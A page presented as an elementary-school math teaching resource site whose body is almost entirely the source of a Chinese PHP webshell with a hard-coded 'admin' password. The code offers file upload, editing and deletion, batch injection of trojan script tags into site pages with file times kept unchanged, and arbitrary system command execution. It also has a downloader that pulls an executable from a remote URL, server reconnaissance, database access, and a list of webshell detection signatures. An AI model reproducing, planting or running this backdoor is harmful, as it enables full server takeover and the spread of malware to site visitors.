小学数学

小学数学教学资源网教学文摘 2015-08-07 手机版



$password = "admin";//设置密码

error_reporting(E_ERROR);

header("content-Type: text/html; charset=gb2312");

set_time_limit(0);

function Root_GP(&$array)

{

while(list($key,$var) = each($array))

{

if((strtoupper($key) != $key || ''.intval($key) == "$key") && $key != 'argc' && $key != 'argv')

{

if(is_string($var)) $array[$key] = stripslashes($var);

if(is_array($var)) $array[$key] = Root_GP($var);

}

}

return $array;

}

function Root_CSS()

{

print<<
\n

END;

return false;

}

//文件管理

class packdir

{

var $out = '';

var $datasec = array();

var $ctrl_dir = array();

var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";

var $old_offset = 0;

function packdir($array)

{

if(@function_exists('gzcompress'))

{

for($n = 0;$n < count($array);$n++)

{

$array[$n] = urldecode($array[$n]);

$fp = @fopen($array[$n], 'r');

$filecode = @fread($fp, @filesize($array[$n]));

@fclose($fp);

$this -> filezip($filecode,basename($array[$n]));

}

@closedir($zhizhen);

$this->out = $this->packfile();

return true;

}

return false;

}

function at($atunix = 0)

{

$unixarr = ($atunix == 0) ? getdate() : getdate($atunix);

if ($unixarr['year'] < 1980)

{

$unixarr['year'] = 1980;

$unixarr['mon'] = 1;

$unixarr['mday'] = 1;

$unixarr['hours'] = 0;

$unixarr['minutes'] = 0;

$unixarr['seconds'] = 0;

}

return (($unixarr['year'] - 1980) << 25) | ($unixarr['mon'] << 21) | ($unixarr['mday'] << 16) | ($unixarr['hours'] << 11) | ($unixarr['minutes'] << 5) | ($unixarr['seconds'] >> 1);

}

function filezip($data, $name, $time = 0)

{

$name = str_replace('\\', '/', $name);

$dtime = dechex($this->at($time));

$hexdtime = '\x'.$dtime[6].$dtime[7].'\x'.$dtime[4].$dtime[5].'\x'.$dtime[2].$dtime[3].'\x'.$dtime[0].$dtime[1];

eval('$hexdtime = "' . $hexdtime . '";');

$fr = "\x50\x4b\x03\x04";

$fr .= "\x14\x00";

$fr .= "\x00\x00";

$fr .= "\x08\x00";

$fr .= $hexdtime;

$unc_len = strlen($data);

$crc = crc32($data);

$zdata = gzcompress($data);

$c_len = strlen($zdata);

$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);

$fr .= pack('V', $crc);

$fr .= pack('V', $c_len);

$fr .= pack('V', $unc_len);

$fr .= pack('v', strlen($name));

$fr .= pack('v', 0);

$fr .= $name;

$fr .= $zdata;

$fr .= pack('V', $crc);

$fr .= pack('V', $c_len);

$fr .= pack('V', $unc_len);

$this -> datasec[] = $fr;

$new_offset = strlen(implode('', $this->datasec));

$cdrec = "\x50\x4b\x01\x02";

$cdrec .= "\x00\x00";

$cdrec .= "\x14\x00";

$cdrec .= "\x00\x00";

$cdrec .= "\x08\x00";

$cdrec .= $hexdtime;

$cdrec .= pack('V', $crc);

$cdrec .= pack('V', $c_len);

$cdrec .= pack('V', $unc_len);

$cdrec .= pack('v', strlen($name) );

$cdrec .= pack('v', 0 );

$cdrec .= pack('v', 0 );

$cdrec .= pack('v', 0 );

$cdrec .= pack('v', 0 );

$cdrec .= pack('V', 32 );

$cdrec .= pack('V', $this -> old_offset );

$this -> old_offset = $new_offset;

$cdrec .= $name;

$this -> ctrl_dir[] = $cdrec;

}

function packfile()

{

$data = implode('', $this -> datasec);

$ctrldir = implode('', $this -> ctrl_dir);

return $data.$ctrldir.$this -> eof_ctrl_dir.pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)).pack('V', strlen($ctrldir)).pack('V', strlen($data))."\x00\x00";

}

}

function File_Str($string)

{

return str_replace('//','/',str_replace('\\','/',$string));

}

function File_Size($size)

{

if($size > 1073741824) $size = round($size / 1073741824 * 100) / 100 . ' G';

elseif($size > 1048576) $size = round($size / 1048576 * 100) / 100 . ' M';

elseif($size > 1024) $size = round($size / 1024 * 100) / 100 . ' K';

else $size = $size . ' B';

return $size;

}

function File_Mode()

{

$RealPath = realpath('./');

$SelfPath = $_SERVER['PHP_SELF'];

$SelfPath = substr($SelfPath, 0, strrpos($SelfPath,'/'));

return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath)));

}

function File_Read($filename)

{

$handle = @fopen($filename,"rb");

$filecode = @fread($handle,@filesize($filename));

@fclose($handle);

return $filecode;

}

function File_Write($filename,$filecode,$filemode)

{

$key = true;

$handle = @fopen($filename,$filemode);

if(!@fwrite($handle,$filecode))

{

@chmod($filename,0666);

$key = @fwrite($handle,$filecode) ? true : false;

}

@fclose($handle);

return $key;

}

function File_Up($filea,$fileb)

{

$key = @copy($filea,$fileb) ? true : false;

if(!$key) $key = @move_uploaded_file($filea,$fileb) ? true : false;

return $key;

}

function File_Down($filename)

{

if(!file_exists($filename)) return false;

$filedown = basename($filename);

$array = explode('.', $filedown);

$arrayend = array_pop($array);

header('Content-type: application/x-'.$arrayend);

header('Content-Disposition: attachment; filename='.$filedown);

header('Content-Length: '.filesize($filename));

@readfile($filename);

exit;

}

function File_Deltree($deldir)

{

if(($mydir = @opendir($deldir)) == NULL) return false;

while(false !== ($file = @readdir($mydir)))

{

$name = File_Str($deldir.'/'.$file);

if((is_dir($name)) && ($file!='.') && ($file!='..')){@chmod($name,0777);File_Deltree($name);}

if(is_file($name)){@chmod($name,0777);@unlink($name);}

}

@closedir($mydir);

@chmod($deldir,0777);

return @rmdir($deldir) ? true : false;

}

function File_Act($array,$actall,$inver)

{

if(($count = count($array)) == 0) return '请选择文件';

if($actall == 'e')

{

$zip = new packdir;

if($zip->packdir($array)){$spider = $zip->out;header("Content-type: application/unknown");header("Accept-Ranges: bytes");header("Content-length: ".strlen($spider));header("Content-disposition: attachment; filename=".$inver.";");echo $spider;exit;}

return '打包所选文件失败';

}

$i = 0;

while($i < $count)

{

$array[$i] = urldecode($array[$i]);

switch($actall)

{

case "a" : $inver = urldecode($inver); if(!is_dir($inver)) return '路径错误'; $filename = array_pop(explode('/',$array[$i])); @copy($array[$i],File_Str($inver.'/'.$filename)); $msg = '复制到'.$inver.'目录'; break;

case "b" : if(!@unlink($array[$i])){@chmod($filename,0666);@unlink($array[$i]);} $msg = '删除'; break;

case "c" : if(!eregi("^[0-7]{4}$",$inver)) return '属性值错误'; $newmode = base_convert($inver,8,10); @chmod($array[$i],$newmode); $msg = '属性修改为'.$inver; break;

case "d" : @touch($array[$i],strtotime($inver)); $msg = '修改时间为'.$inver; break;

}

$i++;

}

return '所选文件'.$msg.'完毕';

}

function File_Edit($filepath,$filename,$dim = '')

{

$THIS_DIR = urlencode($filepath);

$THIS_FILE = File_Str($filepath.'/'.$filename);

if(file_exists($THIS_FILE)){$FILE_TIME = @date('Y-m-d H:i:s',filemtime($THIS_FILE));$FILE_CODE = htmlspecialchars(File_Read($THIS_FILE));}

else {$FILE_TIME = @date('Y-m-d H:i:s',time());$FILE_CODE = '';}

print<<


查找内容:









文件修改时间








END;

}

function File_Soup($p)

{

$THIS_DIR = urlencode($p);

$UP_SIZE = get_cfg_var('upload_max_filesize');

$MSG_BOX = '单个附件允许大小:'.$UP_SIZE.', 改名格式(new.php),如为空,则保持原文件名.';

if(!empty($_POST['updir']))

{

if(count($_FILES['soup']) >= 1)

{

$i = 0;

foreach ($_FILES['soup']['error'] as $key => $error)

{

if ($error == UPLOAD_ERR_OK)

{

$souptmp = $_FILES['soup']['tmp_name'][$key];

if(!empty($_POST['reup'][$i]))$soupname = $_POST['reup'][$i]; else $soupname = $_FILES['soup']['name'][$key];

$MSG[$i] = File_Up($souptmp,File_Str($_POST['updir'].'/'.$soupname)) ? $soupname.'上传成功' : $soupname.'上传失败';

}

$i++;

}

}

else

{

$MSG_BOX = '请选择文件';

}

}

print<<
{$MSG_BOX}




上传到目录:


附件1 改名 $MSG[0]


附件2 改名 $MSG[1]


附件3 改名 $MSG[2]


附件4 改名 $MSG[3]


附件5 改名 $MSG[4]


附件6 改名 $MSG[5]


附件7 改名 $MSG[6]


附件8 改名 $MSG[7]






END;

}

function File_a($p)

{

if(!$_SERVER['SERVER_NAME']) $GETURL = ''; else $GETURL = 'http://'.$_SERVER['SERVER_NAME'].'/';

$MSG_BOX = '等待消息队列';

$UP_DIR = urlencode(File_Str($p.'/..'));

$REAL_DIR = File_Str(realpath($p));

$FILE_DIR = File_Str(dirname(__FILE__));

$ROOT_DIR = File_Mode();

$THIS_DIR = urlencode(File_Str($REAL_DIR));

$NUM_D = 0;

$NUM_F = 0;

if(!empty($_POST['pfn'])){$intime = @strtotime($_POST['mtime']);$MSG_BOX = File_Write($_POST['pfn'],$_POST['pfc'],'wb') ? '编辑文件 '.$_POST['pfn'].' 成功' : '编辑文件 '.$_POST['pfn'].' 失败';@touch($_POST['pfn'],$intime);}

if(!empty($_FILES['ufp']['name'])){if($_POST['ufn'] != '') $upfilename = $_POST['ufn']; else $upfilename = $_FILES['ufp']['name'];$MSG_BOX = File_Up($_FILES['ufp']['tmp_name'],File_Str($REAL_DIR.'/'.$upfilename)) ? '上传文件 '.$upfilename.' 成功' : '上传文件 '.$upfilename.' 失败';}

if(!empty($_POST['actall'])){$MSG_BOX = File_Act($_POST['files'],$_POST['actall'],$_POST['inver']);}

if(isset($_GET['md'])){$modfile = File_Str($REAL_DIR.'/'.$_GET['mk']); if(!eregi("^[0-7]{4}$",$_GET['md'])) $MSG_BOX = '属性值错误'; else $MSG_BOX = @chmod($modfile,base_convert($_GET['md'],8,10)) ? '修改 '.$modfile.' 属性为 '.$_GET['md'].' 成功' : '修改 '.$modfile.' 属性为 '.$_GET['md'].' 失败';}

if(isset($_GET['mn'])){$MSG_BOX = @rename(File_Str($REAL_DIR.'/'.$_GET['mn']),File_Str($REAL_DIR.'/'.$_GET['rn'])) ? '改名 '.$_GET['mn'].' 为 '.$_GET['rn'].' 成功' : '改名 '.$_GET['mn'].' 为 '.$_GET['rn'].' 失败';}

if(isset($_GET['dn'])){$MSG_BOX = @mkdir(File_Str($REAL_DIR.'/'.$_GET['dn']),0777) ? '创建目录 '.$_GET['dn'].' 成功' : '创建目录 '.$_GET['dn'].' 失败';}

if(isset($_GET['dd'])){$MSG_BOX = File_Deltree($_GET['dd']) ? '删除目录 '.$_GET['dd'].' 成功' : '删除目录 '.$_GET['dd'].' 失败';}

if(isset($_GET['df'])){if(!File_Down($_GET['df'])) $MSG_BOX = '下载文件不存在';}

Root_CSS();

print<<


{$MSG_BOX}












































END;

if(($h_d = @opendir($p)) == NULL) return false;

while(false !== ($Filename = @readdir($h_d)))

{

if($Filename == '.' or $Filename == '..') continue;

$Filepath = File_Str($REAL_DIR.'/'.$Filename);

if(is_dir($Filepath))

{

$Fileperm = substr(base_convert(@fileperms($Filepath),10,8),-4);

$Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath));

$Filepath = urlencode($Filepath);

echo "\r\n".' ';

$Filename = urlencode($Filename);

echo ' ';

echo ' ';

echo ' ';

echo ' '."\r\n";

$NUM_D++;

}

}

@rewinddir($h_d);

while(false !== ($Filename = @readdir($h_d)))

{

if($Filename == '.' or $Filename == '..') continue;

$Filepath = File_Str($REAL_DIR.'/'.$Filename);

if(!is_dir($Filepath))

{

$Fileurls = str_replace(File_Str($ROOT_DIR.'/'),$GETURL,$Filepath);

$Fileperm = substr(base_convert(@fileperms($Filepath),10,8),-4);

$Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath));

$Filesize = File_Size(@filesize($Filepath));

if($Filepath == File_Str(__FILE__)) $fname = ''.$Filename.''; else $fname = $Filename;

echo "\r\n".' ';

$Filepath = urlencode($Filepath);

$Filename = urlencode($Filename);

echo ' ';

echo ' ';

echo ' ';

echo ' '."\r\n";

$NUM_F++;

}

}

@closedir($h_d);

if(!$Filetime) $Filetime = '2009-01-01 00:00:00';

print<<
上级目录 操作 属性 修改时间 大小
0 '.$Filename.' 删除 ';

echo ' 改名
'.$Fileperm.' '.$Filetime.'
'.$fname.' 编辑 ';

echo ' 改名
'.$Fileperm.''.$Filetime.' '.$Filesize.'


















目录({$NUM_D}) / 文件({$NUM_F})




END;

return true;

}

//批量挂马

function Guama_Pass($length)

{

$possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";

$str = "";

while(strlen($str) < $length) $str .= substr($possible,(rand() % strlen($possible)),1);

return $str;

}

function Guama_Make($codea,$codeb,$codec)

{

return str_replace($codea,Guama_Pass($codeb),$codec);

}

function Guama_Auto($gp,$gt,$gl,$gc,$gm,$gf,$gi,$gk,$gd,$gb)

{

if(($h_d = @opendir($gp)) == NULL) return false;

if($gm > 12) return false;

while(false !== ($Filename = @readdir($h_d)))

{

if($Filename == '.' || $Filename == '..') continue;

if($gl != ''){if(eregi($gl,$Filename)) continue;}

$Filepath = File_Str($gp.'/'.$Filename);

if(is_dir($Filepath) && $gb) Guama_Auto($Filepath,$gt,$gl,$gc,$gm,$gf,$gi,$gk,$gd,$gb);

if(eregi($gt,$Filename))

{

$fc = File_Read($Filepath);

if(($gk != '') && (stristr($fc,chop($gk)))) continue;

if(($gf != '') && ($gm != 0)) $gcm = Guama_Make($gf,$gm,$gc); else $gcm = $gc;

if($gd) $ftime = @filemtime($Filepath);

if($gi == 'a'){if(!stristr($fc,'')) continue; $fcm = str_replace('',"\r\n".$gcm."\r\n".'',$fc); $fcm = str_replace('',"\r\n".$gcm."\r\n".'',$fcm);}

if($gi == 'b') $fcm = $gcm."\r\n".$fc;

if($gi == 'c') $fcm = $fc."\r\n".$gcm;

echo File_Write($Filepath,$fcm,'wb') ? '成功:'.$Filepath.'

'."\r\n" : '失败:'.$Filepath.'

'."\r\n";

if($gd) @touch($Filepath,$ftime);

ob_flush();

flush();

}

}

@closedir($h_d);

return true;

}

function Guama_b()

{

if((!empty($_POST['gp'])) && (!empty($_POST['gt'])) && (!empty($_POST['gc'])))

{

echo '
';

$_POST['gt'] = str_replace('.','\\.',$_POST['gt']);

if($_POST['inout'] == 'a') $_POST['gl'] = str_replace('.','\\.',$_POST['gl']); else $_POST['gl'] = '';

if(stristr($_POST['gc'],'[-') && stristr($_POST['gc'],'-]'))

{

$temp = explode('[-',$_POST['gc']);

$gk = $temp[0];

preg_match_all("/\[\-([^~]*?)\-\]/i",$_POST['gc'],$nc);

if(!eregi("^[0-9]{1,2}$",$nc[1][0])){echo '异常终止'; return false;}

$gm = (int)$nc[1][0];

$gf = $nc[0][0];

}

else

{

$gk = $_POST['gc'];

$gm = 0;

$gf = '';

}

if(!isset($_POST['gx'])) $gk = '';

$gd = isset($_POST['gd']) ? true : false;

$gb = ($_POST['gb'] == 'a') ? true : false;

echo Guama_Auto($_POST['gp'],$_POST['gt'],$_POST['gl'],$_POST['gc'],$gm,$gf,$_POST['gi'],$gk,$gd,$gb) ? '挂马完毕' : '异常终止';

echo '
';

return false;

}

$FILE_DIR = File_Str(dirname(__FILE__));

$ROOT_DIR = File_Mode();

print<<




挂马路径



文件类型



过滤对象

开启 关闭


挂马代码

挂马变形说明: 程序自动寻找[-6-]标签,替换为随机字符,6表示六位随机字符,最大12位,如果不变形可以不加[-6-]标签.

挂上示例: <script language=javascript src="http://www.baidu.com/ad.js?EMTDSU"></script>


插入</head>标签之前

插入文件最顶端

插入文件最末尾


智能过滤重复代码 保持文件修改时间不变


将挂马应用于该文件夹,子文件夹和文件

仅将挂马应用于该文件夹






END;

return true;

}

//批量清马

function Qingma_Auto($qp,$qt,$qc,$qd,$qb)

{

if(($h_d = @opendir($qp)) == NULL) return false;

while(false !== ($Filename = @readdir($h_d)))

{

if($Filename == '.' || $Filename == '..') continue;

$Filepath = File_Str($qp.'/'.$Filename);

if(is_dir($Filepath) && $qb) Qingma_Auto($Filepath,$qt,$qc,$qd,$qb);

if(eregi($qt,$Filename))

{

$ic = File_Read($Filepath);

if(!stristr($ic,$qc)) continue;

$ic = str_replace($qc,'',$ic);

if($qd) $ftime = @filemtime($Filepath);

echo File_Write($Filepath,$ic,'wb') ? '成功:'.$Filepath.'

'."\r\n" : '失败:'.$Filepath.'

'."\r\n";

if($qd) @touch($Filepath,$ftime);

ob_flush();

flush();

}

}

@closedir($h_d);

return true;

}

function Qingma_c()

{

if((!empty($_POST['qp'])) && (!empty($_POST['qt'])) && (!empty($_POST['qc'])))

{

echo '
';

$qt = str_replace('.','\\.',$_POST['qt']);

$qd = isset($_POST['qd']) ? true : false;

$qb = ($_POST['qb'] == 'a') ? true : false;

echo Qingma_Auto($_POST['qp'],$qt,$_POST['qc'],$qd,$qb) ? '清马完毕' : '异常终止';

echo '
';

return false;

}

$FILE_DIR = File_Str(dirname(__FILE__));

$ROOT_DIR = File_Mode();

print<<




清马路径



文件类型



清除代码


保持文件修改时间不变


将清马应用于该文件夹,子文件夹和文件

仅将清马应用于该文件夹






END;

return true;

}

//批量替换

function Tihuan_Auto($tp,$tt,$th,$tca,$tcb,$td,$tb)

{

if(($h_d = @opendir($tp)) == NULL) return false;

while(false !== ($Filename = @readdir($h_d)))

{

if($Filename == '.' || $Filename == '..') continue;

$Filepath = File_Str($tp.'/'.$Filename);

if(is_dir($Filepath) && $tb) Tihuan_Auto($Filepath,$tt,$th,$tca,$tcb,$td,$tb);

$doing = false;

if(eregi($tt,$Filename))

{

$ic = File_Read($Filepath);

if($th)

{

if(!stristr($ic,$tca)) continue;

$ic = str_replace($tca,$tcb,$ic);

$doing = true;

}

else

{

preg_match_all("/href\=\"([^~]*?)\"/i",$ic,$nc);

for($i = 0;$i < count($nc[1]);$i++){if(eregi($tca,$nc[1][$i])){$ic = str_replace($nc[1][$i],$tcb,$ic);$doing = true;}}

}

if($td) $ftime = @filemtime($Filepath);

if($doing) echo File_Write($Filepath,$ic,'wb') ? '成功:'.$Filepath.'

'."\r\n" : '失败:'.$Filepath.'

'."\r\n";

if($td) @touch($Filepath,$ftime);

ob_flush();

flush();

}

}

@closedir($h_d);

return true;

}

function Tihuan_d()

{

if((!empty($_POST['tp'])) && (!empty($_POST['tt'])))

{

echo '
';

$tt = str_replace('.','\\.',$_POST['tt']);

$td = isset($_POST['td']) ? true : false;

$tb = ($_POST['tb'] == 'a') ? true : false;

$th = ($_POST['th'] == 'a') ? true : false;

if($th) $_POST['tca'] = str_replace('.','\\.',$_POST['tca']);

echo Tihuan_Auto($_POST['tp'],$tt,$th,$_POST['tca'],$_POST['tcb'],$td,$tb) ? '替换完毕' : '异常终止';

echo '
';

return false;

}

$FILE_DIR = File_Str(dirname(__FILE__));

$ROOT_DIR = File_Mode();

print<<




替换路径



文件类型



替换文件中的指定内容 替换文件中的下载地址

查找内容

替换成为


保持文件修改时间不变


将替换应用于该文件夹,子文件夹和文件

仅将替换应用于该文件夹






END;

return true;

}

//扫描木马

function Antivirus_Auto($sp,$features,$st,$sb)

{

if(($h_d = @opendir($sp)) == NULL) return false;

$ROOT_DIR = File_Mode();

while(false !== ($Filename = @readdir($h_d)))

{

if($Filename == '.' || $Filename == '..') continue;

$Filepath = File_Str($sp.'/'.$Filename);

if(is_dir($Filepath) && $sb) Antivirus_Auto($Filepath,$features,$st);

if(eregi($st,$Filename))

{

if($Filepath == File_Str(__FILE__)) continue;

$ic = File_Read($Filepath);

foreach($features as $var => $key)

{

if(stristr($ic,$key))

{

$Fileurls = str_replace($ROOT_DIR,'http://'.$_SERVER['SERVER_NAME'].'/',$Filepath);

$Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath));

echo ' '.$Filepath.'

编辑 删除 】 ';

echo ' 【 '.$Filetime.' 】 '.$var.'

'."\r\n";

break;

}

}

ob_flush();

flush();

}

}

@closedir($h_d);

return true;

}

function Antivirus_e()

{

if(!empty($_GET['df'])){echo $_GET['df'];if(@unlink($_GET['df'])){echo '删除成功';}else{@chmod($_GET['df'],0666);echo @unlink($_GET['df']) ? '删除成功' : '删除失败';} return false;}

if((!empty($_GET['fp'])) && (!empty($_GET['fn'])) && (!empty($_GET['dim']))) { File_Edit($_GET['fp'],$_GET['fn'],$_GET['dim']); return false; }

$SCAN_DIR = isset($_POST['sp']) ? $_POST['sp'] : File_Mode();

$features_php = array('php大马特征1'=>'cha88.cn','php大马特征2'=>'->read()','php大马特征3'=>'readdir(','危险MYSQL语句4'=>'returns string soname','php加密大马特征5'=>'eval(gzinflate(','php加密大马特征6'=>'eval(base64_decode(','php一句话特征7'=>'eval($_','php一句话特征8'=>'eval ($_','php上传后门特征9'=>'copy($_FILES','php上传后门特征10'=>'copy ($_FILES','php上传后门特征11'=>'move_uploaded_file($_FILES','php上传后门特征12'=>'move_uploaded_file ($_FILES','php小马特征13'=>'str_replace(\'\\\\\',\'/\',');

$features_asx = array('asp小马特征1'=>'绝对路径','asp小马特征2'=>'输入马的内容','asp小马特征3'=>'fso.createtextfile(path,true)','asp一句话特征4'=>'<%execute(request','asp一句话特征5'=>'<%eval request','asp一句话特征6'=>'execute session(','asp数据库后门特征7'=>'--Created!','asp大马特征8'=>'WScript.Shell','asp大小马特征9'=>'<%@ LANGUAGE = VBScript.Encode %>','aspx大马特征10'=>'www.rootkit.net.cn','aspx大马特征11'=>'Process.GetProcesses','aspx大马特征12'=>'lake2');

print<<


扫描路径


木马类型 php木马

asp+aspx木马


将扫马应用于该文件夹,子文件夹和文件

仅将扫马应用于该文件夹






END;

if(!empty($_POST['sp']))

{

echo '
';

if(isset($_POST['stphp'])){$features_all = $features_php; $st = '\.php|\.inc|\;';}

if(isset($_POST['stasx'])){$features_all = $features_asx; $st = '\.asp|\.asa|\.cer|\.aspx|\.ascx|\;';}

if(isset($_POST['stphp']) && isset($_POST['stasx'])){$features_all = array_merge($features_php,$features_asx); $st = '\.php|\.inc|\.asp|\.asa|\.cer|\.aspx|\.ascx|\;';}

$sb = ($_POST['sb'] == 'a') ? true : false;

echo Antivirus_Auto($_POST['sp'],$features_all,$st,$sb) ? '扫描完毕' : '异常终止';

echo '
';

}

return true;

}

//搜索文件

function Findfile_Auto($sfp,$sfc,$sft,$sff,$sfb)

{

//echo $sfp.'

'.$sfc.'

'.$sft.'

'.$sff.'

'.$sfb;

if(($h_d = @opendir($sfp)) == NULL) return false;

while(false !== ($Filename = @readdir($h_d)))

{

if($Filename == '.' || $Filename == '..') continue;

if(eregi($sft,$Filename)) continue;

$Filepath = File_Str($sfp.'/'.$Filename);

if(is_dir($Filepath) && $sfb) Findfile_Auto($Filepath,$sfc,$sft,$sff,$sfb);

if($sff)

{

if(stristr($Filename,$sfc))

{

echo ' '.$Filepath.'

'."\r\n";

ob_flush();

flush();

}

}

else

{

$File_code = File_Read($Filepath);

if(stristr($File_code,$sfc))

{

echo ' '.$Filepath.'

'."\r\n";

ob_flush();

flush();

}

}

}

@closedir($h_d);

return true;

}

function Findfile_j()

{

if(!empty($_GET['df'])){echo $_GET['df'];if(@unlink($_GET['df'])){echo '删除成功';}else{@chmod($_GET['df'],0666);echo @unlink($_GET['df']) ? '删除成功' : '删除失败';} return false;}

if((!empty($_GET['fp'])) && (!empty($_GET['fn'])) && (!empty($_GET['dim']))) { File_Edit($_GET['fp'],$_GET['fn'],$_GET['dim']); return false; }

$SCAN_DIR = isset($_POST['sfp']) ? $_POST['sfp'] : File_Mode();

$SCAN_CODE = isset($_POST['sfc']) ? $_POST['sfc'] : 'config';

$SCAN_TYPE = isset($_POST['sft']) ? $_POST['sft'] : '.mp3|.mp4|.avi|.swf|.jpg|.gif|.png|.bmp|.gho|.rar|.exe|.zip';

print<<


扫描路径


过滤文件


关键字串

搜索文件名

搜索包含文字


将搜索应用于该文件夹,子文件夹和文件

仅将搜索应用于该文件夹






END;

if((!empty($_POST['sfp'])) && (!empty($_POST['sfc'])))

{

echo '
';

$_POST['sft'] = str_replace('.','\\.',$_POST['sft']);

$sff = ($_POST['sff'] == 'a') ? true : false;

$sfb = ($_POST['sfb'] == 'a') ? true : false;

echo Findfile_Auto($_POST['sfp'],$_POST['sfc'],$_POST['sft'],$sff,$sfb) ? '搜索完毕' : '异常终止';

echo '
';

}

return true;

}

//系统信息

function Info_Cfg($varname){switch($result = get_cfg_var($varname)){case 0: return "No"; break; case 1: return "Yes"; break; default: return $result; break;}}

function Info_Fun($funName){return (false !== function_exists($funName)) ? "Yes" : "No";}

function Info_f()

{

$dis_func = get_cfg_var("disable_functions");

$upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传";

$adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "".$_SERVER['SERVER_ADMIN']."" : "".get_cfg_var("sendmail_from")."";

if($dis_func == ""){$dis_func = "No";}else{$dis_func = str_replace(" ","

",$dis_func);$dis_func = str_replace(",","

",$dis_func);}

$phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No";

$info = array(

array("服务器时间",date("Y年m月d日 h:i:s",time())),

array("服务器域名","".$_SERVER['SERVER_NAME'].""),

array("服务器IP地址",gethostbyname($_SERVER['SERVER_NAME'])),

array("服务器操作系统",PHP_OS),

array("服务器操作系统文字编码",$_SERVER['HTTP_ACCEPT_LANGUAGE']),

array("服务器解译引擎",$_SERVER['SERVER_SOFTWARE']),

array("你的IP",getenv('REMOTE_ADDR')),

array("Web服务端口",$_SERVER['SERVER_PORT']),

array("PHP运行方式",strtoupper(php_sapi_name())),

array("PHP版本",PHP_VERSION),

array("运行于安全模式",Info_Cfg("safemode")),

array("服务器管理员",$adminmail),

array("本文件路径",__FILE__),

array("允许使用 URL 打开文件 allow_url_fopen",Info_Cfg("allow_url_fopen")),

array("允许动态加载链接库 enable_dl",Info_Cfg("enable_dl")),

array("显示错误信息 display_errors",Info_Cfg("display_errors")),

array("自动定义全局变量 register_globals",Info_Cfg("register_globals")),

array("magic_quotes_gpc",Info_Cfg("magic_quotes_gpc")),

array("程序最多允许使用内存量 memory_limit",Info_Cfg("memory_limit")),

array("POST最大字节数 post_max_size",Info_Cfg("post_max_size")),

array("允许最大上传文件 upload_max_filesize",$upsize),

array("程序最长运行时间 max_execution_time",Info_Cfg("max_execution_time")."秒"),

array("被禁用的函数 disable_functions",$dis_func),

array("phpinfo()",$phpinfo),

array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),

array("图形处理 GD Library",Info_Fun("imageline")),

array("IMAP电子邮件系统",Info_Fun("imap_close")),

array("MySQL数据库",Info_Fun("mysql_close")),

array("SyBase数据库",Info_Fun("sybase_close")),

array("Oracle数据库",Info_Fun("ora_close")),

array("Oracle 8 数据库",Info_Fun("OCILogOff")),

array("PREL相容语法 PCRE",Info_Fun("preg_match")),

array("PDF文档支持",Info_Fun("pdf_close")),

array("Postgre SQL数据库",Info_Fun("pg_close")),

array("SNMP网络管理协议",Info_Fun("snmpget")),

array("压缩文件支持(Zlib)",Info_Fun("gzclose")),

array("XML解析",Info_Fun("xml_set_object")),

array("FTP",Info_Fun("ftp_login")),

array("ODBC数据库连接",Info_Fun("odbc_close")),

array("Session支持",Info_Fun("session_start")),

array("Socket支持",Info_Fun("fsockopen")),

);

echo '';

for($i = 0;$i < count($info);$i++){echo ''."\n";}

echo '
'.$info[$i][0].''.$info[$i][1].'
';

return true;

}

//执行命令

function Exec_Run($cmd)

{

$res = '';

if(function_exists('exec')){@exec($cmd,$res);$res = join("\n",$res);}

elseif(function_exists('shell_exec')){$res = @shell_exec($cmd);}

elseif(function_exists('system')){@ob_start();@system($cmd);$res = @ob_get_contents();@ob_end_clean();}

elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_contents();@ob_end_clean();}

elseif(@is_resource($f = @popen($cmd,"r"))){$res = '';while(!@feof($f)){$res .= @fread($f,1024);}@pclose($f);}

return $res;

}

function Exec_g()

{

$res = '回显窗口';

$cmd = 'dir';

if(!empty($_POST['cmd'])){$res = Exec_Run($_POST['cmd']);$cmd = $_POST['cmd'];}

print<<




命令参数









END;

return true;

}

//组件接口

function Com_h()

{

$object = isset($_GET['o']) ? $_GET['o'] : 'adodb';

print<<




END;

if($object == 'downloader')

{

$Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe';

$Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(__FILE__).'/muma.exe');

print<<
超连接


下载到




END;

if((!empty($_POST['durl'])) && (!empty($_POST['dpath'])))

{

echo '
';

$contents = @file_get_contents($_POST['durl']);

if(!$contents) echo '无法读取要下载的数据';

else echo File_Write($_POST['dpath'],$contents,'wb') ? '下载文件成功' : '下载文件失败';

echo '
';

}

}

elseif($object == 'wscript')

{

$cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'dir';

print<<
执行CMD命令




END;

if(!empty($_POST['cmd']))

{

echo '
';

$shell = new COM('wscript');

$exe = @$shell->exec("cmd.exe /c ".$cmd);

$out = $exe->StdOut();

$output = $out->ReadAll();

echo '
'.$output.'
';

@$shell->Release();

$shell = NULL;

echo '
';

}

}

elseif($object == 'application')

{

$run = isset($_POST['run']) ? $_POST['run'] : 'cmd.exe';

$cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'copy c:\windows\php.ini c:\php.ini';

print<<
程序路径


命令参数




END;

if(!empty($_POST['run']))

{

echo '
';

$shell = new COM('application');

echo (@$shell->ShellExecute($run,'/c '.$cmd) == '0') ? '执行成功' : '执行失败';

@$shell->Release();

$shell = NULL;

echo '
';

}

}

elseif($object == 'adodb')

{

$string = isset($_POST['string']) ? $_POST['string'] : '';

$sql = isset($_POST['sql']) ? $_POST['sql'] : '';

print<<


连接字符串



SQL命令






END;

if(!empty($string))

{

echo '
';

$shell = new COM('adodb');

@$shell->Open($string);

$result = @$shell->Execute($sql);

$count = $result->Fields->Count();

for($i = 0;$i < $count;$i++){$Field[$i] = $result->Fields($i);}

echo $result ? $sql.' 执行成功

' : $sql.' 执行失败

';

if(!empty($count)){while(!$result->EOF){for($i = 0;$i < $count;$i++){echo htmlspecialchars($Field[$i]->value).'

